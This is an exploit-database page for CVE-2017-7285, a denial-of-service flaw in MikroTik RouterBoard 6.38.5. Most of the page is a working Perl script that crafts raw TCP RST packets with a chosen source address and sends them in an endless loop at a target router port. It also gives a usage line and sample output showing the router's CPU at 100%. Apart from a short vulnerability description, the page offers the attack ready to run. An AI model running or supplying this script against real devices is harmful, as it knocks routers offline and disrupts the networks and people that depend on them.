MikroTik RouterBoard V-6.38.5 Denial Of Service | CPU Consumption

################
#Exploit Title: MikroTik RouterBoard V-6.38.5 Denial Of Service | CPU Consumption
#CVE: CVE-2017-7285
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : V-6.38.5
#Exploit Tested on: LionSec OS
#Date: 28-03-2017
#Category: Network Appliance
#Author Mail : [email protected]
#Description: A vulnerability in the network stack of MikroTik Version 6.38.5 released 2017-03-09 could allow an unauthenticated remote
attacker to exhaust all available CPU via a flood of TCP RST packets, preventing the affected router
from accepting new TCP connections.
###############
Exploit: #perl exploit.pl 192.168.3.253 2000 192.168.3.1 8291(winbox port)
#!/usr/local/bin/perl

use Socket;

$src_host = $ARGV[0];
$src_port = $ARGV[1];
$dst_host = $ARGV[2];
$dst_port = $ARGV[3];

if(!defined $src_host or !defined $src_port or !defined $dst_host or !defined $dst_port)
{
  
    print "Usage: $0 <source host> <source port> <dest host> <dest port>\n";
    exit;
}
else
{
  
    main();
}
 
sub main
{
    my $src_host = (gethostbyname($src_host))[4];
    my $dst_host = (gethostbyname($dst_host))[4];
    $IPROTO_RAW = 255;
    socket($sock , AF_INET, SOCK_RAW, $IPROTO_RAW)
        or die $!;
    my ($packet) = makeheaders($src_host, $src_port, $dst_host, $dst_port);
    my ($destination) = pack('Sna4x8', AF_INET, $dst_port, $dst_host);
    while(1)
    {
        send($sock , $packet , 0 , $destination)
            or die $!;
    }
}

sub makeheaders
{
    $IPPROTO_TCP = 6;
    local($src_host , $src_port , $dst_host , $dst_port) = @_;
    my $zero_cksum = 0;
    my $tcp_len = 20;
    my $seq = 19456;
    my $seq_ack = 0;
    my $tcp_doff = "5";
    my $tcp_res = 0;
    my $tcp_doff_res = $tcp_doff . $tcp_res;
    my $tcp_urg = 0;
    my $tcp_ack = 0;
    my $tcp_psh = 0;
    my $tcp_rst = 1;
    my $tcp_syn = 0;
    my $tcp_fin = 0;
    my $null = 0;
    my $tcp_win = 124;
    my $tcp_urg_ptr = 44;
    my $tcp_flags = $null . $null . $tcp_urg . $tcp_ack . $tcp_psh . $tcp_rst . $tcp_syn . $tcp_fin ;
    my $tcp_check = 0;
    my $tcp_header = pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $seq_ack , $tcp_doff_res, $tcp_flags,  $tcp_win , $tcp_check, $tcp_urg_ptr);
    my $tcp_pseudo = pack('a4a4CCn' , $src_host, $dst_host, 0, $IPPROTO_TCP, length($tcp_header) ) . $tcp_header;
    $tcp_check = &checksum($tcp_pseudo);
    my $tcp_header = pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $seq_ack , $tcp_doff_res, $tcp_flags,  $tcp_win , $tcp_check, $tcp_urg_ptr);
    my $ip_ver = 4;
    my $ip_len = 5;
    my $ip_ver_len = $ip_ver . $ip_len;
    my $ip_tos = 00;
    my $ip_tot_len = $tcp_len + 20;
    my $ip_frag_id = 19245;
    my $ip_ttl = 25;
    my $ip_proto = $IPPROTO_TCP;  
    my $ip_frag_flag = "010";
    my $ip_frag_oset = "0000000000000";
    my $ip_fl_fr = $ip_frag_flag . $ip_frag_oset;
    my $ip_header = pack('H2CnnB16CCna4a4',    $ip_ver_len, $ip_tos, $ip_tot_len, $ip_frag_id,    $ip_fl_fr , $ip_ttl , $ip_proto , $zero_cksum , $src_host , $dst_host);
    my $pkt = $ip_header . $tcp_header;
    return $pkt;
}
sub checksum
{
    my ($msg) = @_;
    my ($len_msg,$num_short,$short,$chk);
    $len_msg = length($msg);
    $num_short = $len_msg / 2;
    $chk = 0;
  
    foreach $short (unpack("S$num_short", $msg))
    {
        $chk += $short;
    }
  
    $chk += unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2;
    $chk = ($chk >> 16) + ($chk & 0xffff);
  
    return(~(($chk >> 16) + $chk) & 0xffff);
}

####################
The sample of resource usage is shown below:
[admin@MikroTik] > system resource monitor
          cpu-used: 100%
  cpu-used-per-cpu: 100%
       free-memory: 8480KiB

Copyright ©2024 Exploitalert.